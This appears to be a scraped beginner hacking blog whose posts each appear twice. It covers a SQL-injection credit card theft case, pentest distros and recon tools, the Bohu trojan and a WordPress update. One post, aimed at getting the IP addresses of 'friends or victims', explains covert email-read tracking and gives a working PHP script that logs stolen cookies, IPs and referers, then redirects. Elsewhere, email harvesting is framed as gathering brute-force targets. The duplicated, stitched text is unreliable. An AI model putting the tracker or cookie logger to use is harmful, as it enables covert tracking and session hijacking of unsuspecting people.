Hacker Used SQL-injection to Get 675K Credit Card

A computer hacker from Georgia has pleaded guilty to fraud and identity theft after authorities found him with more than 675,000 stolen credit card accounts on his home computers, Credit card companies have traced more than $36 million in fraudulent transactions to the accounts that were breached by Rogelio Hackett.

How he did it? Hacker briefly used the SQL-injection attack on web resources he was able to use different SQL vulnerabilities despite that this kind of vulnerability is well known. SQL injection is one of the popular attacks on web application’s backend database it is not like XSS vulnerability where attacker uses JavaScript to target the client browser, SQL injection targets the SQL statement being executed by the application on the backend database.

Hackers usually identify the SQL injection vulnerability by adding invalid or unexpected characters to a parameter value and watch for errors in application’s response. For example:

http://www.example.com/users.asp?id=mark’

If the request generates an error, it is a good indication of a mishandled quotation mark and the application may be vulnerable to SQL injection attacks. While I think that automated tools can do fast job in checking these vulnerabilities such as Havij a very fast tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

Attack with SQL-code uses poorly written Web-based applications that directly write data into the database. In fact, SQL-injection does not depend on application language as mistakes in programming allow SQL-injection use almost any programming language.

That’s why it is very important to conduct Application black-box penetration testing as this can reveal OWASP Top 10 application vulnerabilities, including SQL injection, parameter manipulation, cookie poisoning, and XSS.

An attacker who wishes to grab usernames and passwords might try phishing and social engineering attacks against some user’s application. On the other hand, Hackers can try to pull everyone’s credentials directly from the database.

Hacker Used SQL-injection to Get 675K Credit Card

A computer hacker from Georgia has pleaded guilty to fraud and identity theft after authorities found him with more than 675,000 stolen credit card accounts on his home computers, Credit card companies have traced more than $36 million in fraudulent transactions to the accounts that were breached by Rogelio Hackett.

How he did it? Hacker briefly used the SQL-injection attack on web resources he was able to use different SQL vulnerabilities despite that this kind of vulnerability is well known. SQL injection is one of the popular attacks on web application’s backend database it is not like XSS vulnerability where attacker uses JavaScript to target the client browser, SQL injection targets the SQL statement being executed by the application on the backend database.

Hackers usually identify the SQL injection vulnerability by adding invalid or unexpected characters to a parameter value and watch for errors in application’s response. For example:

http://www.example.com/users.asp?id=mark’

If the request generates an error, it is a good indication of a mishandled quotation mark and the application may be vulnerable to SQL injection attacks. While I think that automated tools can do fast job in checking these vulnerabilities such as Havij a very fast tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

Attack with SQL-code uses poorly written Web-based applications that directly write data into the database. In fact, SQL-injection does not depend on application language as mistakes in programming allow SQL-injection use almost any programming language.

That’s why it is very important to conduct Application black-box penetration testing as this can reveal OWASP Top 10 application vulnerabilities, including SQL injection, parameter manipulation, cookie poisoning, and XSS.

An attacker who wishes to grab usernames and passwords might try phishing and social engineering attacks against some user’s application. On the other hand, Hackers can try to pull everyone’s credentials directly from the database.

Hacking A Biometric System

Description: This paper was presented in NullCOn 2011
"Penetration Testing Biometrics Systems "

You could read the detailed paper by following the below mentioned links.

PDF version: http://www.fb1h2s.com/Null_Biometrics.pdf

Hacking A Biometric System

Description: This paper was presented in NullCOn 2011
"Penetration Testing Biometrics Systems "

You could read the detailed paper by following the below mentioned links.

PDF version: http://www.fb1h2s.com/Null_Biometrics.pdf

HOW TO GET IP ADRESS EASILY

I have been getting requests that the content we are posting is not easy for beginners.I was little disappointed with such review so here we go simple yet effective post about very basic of intenet,networking the IP-address.

What is an IP address?
Every device connected to the public Internet is assigned a unique number known as an Internet Protocol (IP) address. IP addresses consist of four numbers separated by periods (also called a 'dotted-quad') and look something like 112.123.123.121(etc this is example of ipv4)

What can be done with an IP address?

IP adress is the very basic unit before you start a hack its basically used for fingerprinting,tracing and if victim is weak it wont take 10 secs to penetrate through vulnerability :)

HOW can I get an IP address?

Its an easy task to get your aswell as others ip addresses
to get your own ip address just go to this website

How to get ip of a website?

go to shell(command prompt) just type ping www.target.com
and there it will start showing numeric just like in this picture

How to get IP address of friends or victims?

Using E-mail receipts


E-mail receipt is a kind of notification you get as an e-mail when someone open (reading the mail send by you) your mail.


This notification consist of

• IP address of the mail reader.
• Time and date of reading the mail.
• Name and version of his browser.

 You need to follow these steps


a. Step 1:-


Visit readnotify and signup there. You can use your gmail, yahoo, hotmail,rediff or any email id. They give free trials for 2 weeks or 25 emails whichever comes first.


b. Step 2:-


Let's say you have used your email id example@gmail.com to register on readnotify.com, than login to your email account first.


c. Step 3:-


Click on the Compose mail menu and in the To : section write the email id of the culprit followed by readnotify.com, so the complete email address would be like victim@gmail.com.readnotify.com. 
just the normal procedure of email

step 4
you are done just wait for the victim to open that email volla you will get the details.
 

Using php scripts 

here is the basic php script

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: http://google.com/")
?>

Process:save it in you hosting ripway,my3gb,blackapplehost etc dont forget to create a file.txt file which will save all the ips 

This will save ips with date,time,from where link came+u can redirect to another url just like i redirected to google in matter of seconds.

Upcoming post will be on fingerprinting with ip address so we can work with a flow.

Do share you views on this post i tried to keep it simple.

HOW TO GET IP ADRESS EASILY

I have been getting requests that the content we are posting is not easy for beginners.I was little disappointed with such review so here we go simple yet effective post about very basic of intenet,networking the IP-address.

What is an IP address?
Every device connected to the public Internet is assigned a unique number known as an Internet Protocol (IP) address. IP addresses consist of four numbers separated by periods (also called a 'dotted-quad') and look something like 112.123.123.121(etc this is example of ipv4)

What can be done with an IP address?

IP adress is the very basic unit before you start a hack its basically used for fingerprinting,tracing and if victim is weak it wont take 10 secs to penetrate through vulnerability :)

HOW can I get an IP address?

Its an easy task to get your aswell as others ip addresses
to get your own ip address just go to this website

How to get ip of a website?

go to shell(command prompt) just type ping www.target.com
and there it will start showing numeric just like in this picture

How to get IP address of friends or victims?

Using E-mail receipts


E-mail receipt is a kind of notification you get as an e-mail when someone open (reading the mail send by you) your mail.


This notification consist of

• IP address of the mail reader.
• Time and date of reading the mail.
• Name and version of his browser.

 You need to follow these steps


a. Step 1:-


Visit readnotify and signup there. You can use your gmail, yahoo, hotmail,rediff or any email id. They give free trials for 2 weeks or 25 emails whichever comes first.


b. Step 2:-


Let's say you have used your email id example@gmail.com to register on readnotify.com, than login to your email account first.


c. Step 3:-


Click on the Compose mail menu and in the To : section write the email id of the culprit followed by readnotify.com, so the complete email address would be like victim@gmail.com.readnotify.com. 
just the normal procedure of email

step 4
you are done just wait for the victim to open that email volla you will get the details.
 

Using php scripts 

here is the basic php script

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: http://google.com/")
?>

Process:save it in you hosting ripway,my3gb,blackapplehost etc dont forget to create a file.txt file which will save all the ips 

This will save ips with date,time,from where link came+u can redirect to another url just like i redirected to google in matter of seconds.

Upcoming post will be on fingerprinting with ip address so we can work with a flow.

Do share you views on this post i tried to keep it simple.

WEAKERTHAN LINUX FOR HACKERS

Most of you would have heard about backtrack but its not the only one in the business.Weakerthan is another linux based pentesting distro which is really good..Weakerthan is my second favorite after backtrack


Intro:

WeakNet Linux is designed primarily for penetration testing, forensic analysis and other security tasks. The default desktop environment is GNOME.

The tools i have selected are tools we use all the time here, as i said, If you find some that you want in it, please let me know. The image is about 1GB meaning; It will have to be on DVD, meaning; I can't host it here without risk of bandwidth dying! I need a place to upload it to. Some code written by WeakNet Labs Assistants from this site that are preinstalled:

* BRuWRT-FORSSE v2.0
* Easy-SSHd
* Web-Hacking-Portal v2.0
* Perlwd
* Netgh0st v3.0
* YouTube-Thief!
* Netgh0st v2.2
* DomainScan
* ADtrace
* Admin-Tool
* Tartarus v0.1
* and much more..

really good GUI+vulnerable applications to test our hacking skills


my personal experience with weaknet was really good & its worth.

WEAKERTHANv2 WeakNet Linux 5 - ISO ~684MB 
WeakNet Linux Complete Administration Guide 

WEAKERTHAN LINUX FOR HACKERS

Most of you would have heard about backtrack but its not the only one in the business.Weakerthan is another linux based pentesting distro which is really good.My second favorite after backi


Intro:

WeakNet Linux is designed primarily for penetration testing, forensic analysis and other security tasks. The default desktop environment is GNOME.

The tools i have selected are tools we use all the time here, as i said, If you find some that you want in it, please let me know. The image is about 1GB meaning; It will have to be on DVD, meaning; I can't host it here without risk of bandwidth dying! I need a place to upload it to. Some code written by WeakNet Labs Assistants from this site that are preinstalled:

* BRuWRT-FORSSE v2.0
* Easy-SSHd
* Web-Hacking-Portal v2.0
* Perlwd
* Netgh0st v3.0
* YouTube-Thief!
* Netgh0st v2.2
* DomainScan
* ADtrace
* Admin-Tool
* Tartarus v0.1
* and much more..

really good GUI+vulnerable applications to test our hacking skills


my personal experience with weaknet was really good & its worth.

WEAKERTHANv2 WeakNet Linux 5 - ISO ~684MB 
WeakNet Linux Complete Administration Guide 

WHAT IS LINUX

As you move in this world of hacking.You will realise the importance of linux for hackers,programmers,geeks.

I wont go in deep here in hackersbay for more tutorials&functioning of linux you can refer to our sister site

 What exactly is linux&its importance

Linux is an operating system based on unix.Some other common operating systems are Unix (and its variants BSD, AIX, Solaris, HP-UX, and others); DOS; Microsoft Windows; Amiga; and Mac OS.

Linux was originally created by Linus Torvalds with the assistance of developers from around the globe. Linux is free to download, edit and distribute. Linux is a very powerful operating system and it is gradually becoming popular throughout the world.

World's fastest supercomputer uses linux so you can realise how powerful linux can be.

Linux is free operating system not like windows where you have to pay thousands of $$ costing half of the hardware of pc.Linux is an open source means anyone can edit it legally as per his/her convenience.

There are many distributions of linux available -ubuntu, madvira, fedora, open suse, mint etc


But desktop market 7-15% bcuz its not easy to use it..but once u get habit of it i bet ull spit on windows

  Advantages Of linux

1) BETTER SECURITY THAN WINDOWS -- Nowadays you can easily see windows remote exploit flying around.Yes windows is easy to attack as compared to linux.

2)RESOURCES AVAILABLE BY DEFAULT-many software addons drivers are already installed on it

3)GOOD FOR HACKING - There are distributions specially designed for hackers backtrack,weaknet,blackbuntu,secmic etc

4)ITS FREE NOT LIKE WINDOWS (WHO WILL PAY THOUSANDS OF $$ )
the only linux which costs some pennies is redhat.

5)LIVE CD-One of the best feature you can run it without evan affecting your hd

DISADVANTAGES

1)NOT MANY S/W companies supporting linux based softwares

2)NOT EASY AS WINDOWS --Its command based,&requires tweaking.

3)EXE SUPPORT-basic extension exe is not supported but you can run them via WINE

What for beginners?where to start from

Well i would suggest ubuntu(only linux for humans) as it has largest community support so if you have any problem it could be easily resolved easily and its much user friendly linux

grab these 2 books linux bible&ubuntu unleashed.These books have good data for linux and ubuntu if you want to learn linux more deeply.


for linux tweaks and tutorial we wont post them on hb u can find them on basicgeeks.com

upcoming updates:linux distributions for hackers :)




Do share the post with your friends.

WHAT IS LINUX

As you move in this world of hacking.You will realise the importance of linux for hackers,programmers,geeks.

I wont go in deep here in hackersbay for more tutorials&functioning of linux you can refer to our sister site

 What exactly is linux&its importance

Linux is an operating system based on unix.Some other common operating systems are Unix (and its variants BSD, AIX, Solaris, HP-UX, and others); DOS; Microsoft Windows; Amiga; and Mac OS.

Linux was originally created by Linus Torvalds with the assistance of developers from around the globe. Linux is free to download, edit and distribute. Linux is a very powerful operating system and it is gradually becoming popular throughout the world.

World's fastest supercomputer uses linux so you can realise how powerful linux can be.

Linux is free operating system not like windows where you have to pay thousands of $$ costing half of the hardware of pc.Linux is an open source means anyone can edit it legally as per his/her convenience.

There are many distributions of linux available -ubuntu,madvira,fedora,open suse,mint etc


But desktop market 7-15% bcuz its not easy to use it..but once u get habit of it i bet ull spit on windows

ADVANTAGES

1)FAR FAR BETTER SECURITY THAN WINDOWS -- Nowadays you can easily see windows remote exploit flying around.Yes windows is easy to attack as compared to linux.

2)RESOURCES AVAILABLE BY DEFAULT-many software addons drivers are already installed on it

3)GOOD FOR HACKING - There are distributions specially designed for hackers backtrack,weaknet,blackbuntu,secmic etc

4)ITS FREE NOT LIKE WINDOWS (WHO WILL PAY THOUSANDS OF $$ )
the only linux which costs some pennies is redhat.

5)LIVE CD-One of the best feature you can run it without evan affecting your hd

DISADVANTAGES
 
1)NOT MANY S/W companies supporting linux based softwares

2)NOT EASY AS WINDOWS --Its command based,&requires tweaking.

3)EXE SUPPORT-basic extension exe is not supported but you can run them via WINE

What for beginners?where to start from

Well i would suggest ubuntu(only linux for humans) as it has largest community support so if you have any problem it could be easily resolved easily and its much user friendly linux

grab these 2 books linux bible&ubuntu unleashed.These books have good data for linux and ubuntu if you want to learn linux more deeply.


for linux tweaks and tutorial we wont post them on hb u can find them on basicgeeks.com

upcoming updates:linux distributions for hackers :)




Do share the post with your friends.

Websecurify Security Testing Framework

Websecurify is a powerful web application security testing platform designed from the ground up to provide the best combination of automatic and manual vulnerability testing technologies.

Some of the main features of Websecurify include:

• Available for all major operating systems (Windows, Mac OS, Linux)
• Simple to use user interface
• Built-in internationalization support
• Easily extensible with the help of add-ons and plugins
• Exportable and customisable reports with any level of detail
• Moduler and reusable design
• Powerful manual testing tools and helper facilities
• Powerful analytical and scanning technology
• Scriptable support for JavaScript and Python
• Extensible via many languages including JavaScript, Python, C, C++ and Java 

You can download Websecuify here

Websecurify Security Testing Framework

Websecurify is a powerful web application security testing platform designed from the ground up to provide the best combination of automatic and manual vulnerability testing technologies.

Some of the main features of Websecurify include:

• Available for all major operating systems (Windows, Mac OS, Linux)
• Simple to use user interface
• Built-in internationalization support
• Easily extensible with the help of add-ons and plugins
• Exportable and customisable reports with any level of detail
• Moduler and reusable design
• Powerful manual testing tools and helper facilities
• Powerful analytical and scanning technology
• Scriptable support for JavaScript and Python
• Extensible via many languages including JavaScript, Python, C, C++ and Java 

You can download Websecuify here

QuickRecon: Simple Information Gathering Python Script

QuickRecon is a simple information gathering tool, that allows you to:

• Find subdomain names
• Perform zone transfer
• Gather emails from Google.com and Bing.com

For those unknown, DNS zone transfer, is a type of DNS transaction that allows us to replicate the databases containing the DNS data across a set of DNS servers. Zone transfer comes in two flavors, full (opcode AXFR) and incremental (IXFR). AXFR stands for Asynchronous Full Transfer Zone and IXFR stands for Incremental Zone Transfer. This simple Python script depends on DNS toolkit ‘dnspython‘ while performing a zone transfer.


The e-mail gathering feature of this tool can also be used in a lot of ways – to learn about possible targets for account brute force, social engineering, etc.


The best part about this script is that it is cross compatible with multiple operating systems. It has been successfully tested on Windows XP and BackTrack 4 R2 with a Python 2.x installation.


Sample usage:

Obtaining subdomain names (built-in dictionary):
python quickrecon.py -m s -d example.com -o out.log


or (an external dictionary):
python quickrecon.py -m s -d example.com -i your_subdomains.txt


Zone Transfer:
python quickrecon.py -m z -d example.com


Gathering emails from Google.com and Bing.com:


python quickrecon.py -m e -d example.com -o out.log
python quickrecon.py -m e -d example.com -l 500

(quickrecon-0.2.zip) here.

QuickRecon: Simple Information Gathering Python Script

QuickRecon is a simple information gathering tool, that allows you to:

• Find subdomain names
• Perform zone transfer
• Gather emails from Google.com and Bing.com

For those unknown, DNS zone transfer, is a type of DNS transaction that allows us to replicate the databases containing the DNS data across a set of DNS servers. Zone transfer comes in two flavors, full (opcode AXFR) and incremental (IXFR). AXFR stands for Asynchronous Full Transfer Zone and IXFR stands for Incremental Zone Transfer. This simple Python script depends on DNS toolkit ‘dnspython‘ while performing a zone transfer.


The e-mail gathering feature of this tool can also be used in a lot of ways – to learn about possible targets for account brute force, social engineering, etc.


The best part about this script is that it is cross compatible with multiple operating systems. It has been successfully tested on Windows XP and BackTrack 4 R2 with a Python 2.x installation.


Sample usage:

Obtaining subdomain names (built-in dictionary):
python quickrecon.py -m s -d example.com -o out.log


or (an external dictionary):
python quickrecon.py -m s -d example.com -i your_subdomains.txt


Zone Transfer:
python quickrecon.py -m z -d example.com


Gathering emails from Google.com and Bing.com:


python quickrecon.py -m e -d example.com -o out.log
python quickrecon.py -m e -d example.com -l 500

(quickrecon-0.2.zip) here.

Trojan to Disable Cloud-Based Antivirus--BOHU

A recent blog entry from the Microsoft Malware Protection Center details information about a new malware (called Win32/Bohu.A) which is specifically designed to disable and mislead cloud-based antivirus software.
Cloud-based antivirus software differs from traditional antivirus software in that the antivirus client (running on the PC) sends important threat data to a server for backend analysis, and subsequently receives further detection and removal instruction.


The Bohu Trojan originates in China where there is a predominate use of cloud-based antivirus software. Once a Windows based machine is infected the malware installs different network level filters to disrupt and block the antivirus client accessing the backend antivirus services on the Internet.
As well as writing random data at the end of its key payload components to avoid hash-based detection, Bohu also installs a Windows Sockets service provider interface (SPI) filter to block the antivirus network traffic as well as a Network Driver Interface Specification (NDIS) filter. The NDIS filter then stops the antivirus client from uploading data to the server by looking for the server addresses in the data packets.

Trojan to Disable Cloud-Based Antivirus--BOHU

A recent blog entry from the Microsoft Malware Protection Center details information about a new malware (called Win32/Bohu.A) which is specifically designed to disable and mislead cloud-based antivirus software.
Cloud-based antivirus software differs from traditional antivirus software in that the antivirus client (running on the PC) sends important threat data to a server for backend analysis, and subsequently receives further detection and removal instruction.


The Bohu Trojan originates in China where there is a predominate use of cloud-based antivirus software. Once a Windows based machine is infected the malware installs different network level filters to disrupt and block the antivirus client accessing the backend antivirus services on the Internet.
As well as writing random data at the end of its key payload components to avoid hash-based detection, Bohu also installs a Windows Sockets service provider interface (SPI) filter to block the antivirus network traffic as well as a Network Driver Interface Specification (NDIS) filter. The NDIS filter then stops the antivirus client from uploading data to the server by looking for the server addresses in the data packets.

WordPress Releases Security Hardening Update

The WordPress project has announced the releases of WordPress 3.0.5. Dubbed as a security hardening release it is an essential update for those with any untrusted user accounts, but it also comes with other important security enhancements and hardening for all WordPress installations.
Two cross site scripting bugs have been squashed:

• Properly encode title used in Quick/Bulk Edit, and offer additional sanitization to various fields. Affects users of the Author or Contributor role.
• Preserve tag escaping in the tags meta box. Affects users of the Author or Contributor role.

Also included in 3.0.5 are two security enhancements one of which improves the security of any plugins which were not properly leveraging the WordPress security API.
All WordPress administrators are encouraged to upgrade to this latest version. You can update automatically from the Dashboard > Updates menu in your site’s admin area or download 3.0.5 directly

WordPress Releases Security Hardening Update

The WordPress project has announced the releases of WordPress 3.0.5. Dubbed as a security hardening release it is an essential update for those with any untrusted user accounts, but it also comes with other important security enhancements and hardening for all WordPress installations.
Two cross site scripting bugs have been squashed:

• Properly encode title used in Quick/Bulk Edit, and offer additional sanitization to various fields. Affects users of the Author or Contributor role.
• Preserve tag escaping in the tags meta box. Affects users of the Author or Contributor role.

Also included in 3.0.5 are two security enhancements one of which improves the security of any plugins which were not properly leveraging the WordPress security API.
All WordPress administrators are encouraged to upgrade to this latest version. You can update automatically from the Dashboard > Updates menu in your site’s admin area or download 3.0.5 directly

WhatWeb-Next Generation Web Explorer

Introduction

Identify content management systems (CMS), blogging platforms, stats/analytics packages, javascript libraries, servers and more. When you visit a website in your browser the transaction includes many unseen hints about how the webserver is set up and what software is delivering the webpage.
Some of these hints are obvious, eg. “Powered by XYZ” and others are more subtle. WhatWeb recognises these cues and reports what it finds.

WhatWeb has over 250 plugins and needs community support to develop more. Plugins can identify systems with obvious identifying hints removed by also looking for subtle clues. For example, a WordPress site might remove the tag but the WordPress plugin also looks for “wp-content” which is less easy to disguise. Plugins are flexible and can return any datatype, for example plugins can return version numbers, email addresses, account ID’s and more.

There are both passive and aggressive plugins, passive plugins use information on the page, in cookies and in the URL to identify the system. A passive request is as light weight as a simple GET / HTTP/1.1 request. Aggressive plugins guess URLs and request more files. Plugins are easy to write, you don’t need to know ruby to make them.

Example Usage

i tested simple command on our sister site www.basicgeeks.com and result was good

Log Output

There are currently 3 types of log output. They are:
–log-brief Brief logging. Default output
–log-full Full logging. Complete output from each plugin
–log-xml XML logging. Same information as default output but in XML format
You can output to multiple logs simulatenously by specifying muliple command line logging options.

 you can download whatweb here

WhatWeb-Next Generation Web Explorer

Introduction

Identify content management systems (CMS), blogging platforms, stats/analytics packages, javascript libraries, servers and more. When you visit a website in your browser the transaction includes many unseen hints about how the webserver is set up and what software is delivering the webpage.
Some of these hints are obvious, eg. “Powered by XYZ” and others are more subtle. WhatWeb recognises these cues and reports what it finds.

WhatWeb has over 250 plugins and needs community support to develop more. Plugins can identify systems with obvious identifying hints removed by also looking for subtle clues. For example, a WordPress site might remove the tag but the WordPress plugin also looks for “wp-content” which is less easy to disguise. Plugins are flexible and can return any datatype, for example plugins can return version numbers, email addresses, account ID’s and more.

There are both passive and aggressive plugins, passive plugins use information on the page, in cookies and in the URL to identify the system. A passive request is as light weight as a simple GET / HTTP/1.1 request. Aggressive plugins guess URLs and request more files. Plugins are easy to write, you don’t need to know ruby to make them.

Example Usage

i tested simple command on our sister site www.basicgeeks.com and result was good

Log Output

There are currently 3 types of log output. They are:
–log-brief Brief logging. Default output
–log-full Full logging. Complete output from each plugin
–log-xml XML logging. Same information as default output but in XML format
You can output to multiple logs simulatenously by specifying muliple command line logging options.

 you can download whatweb here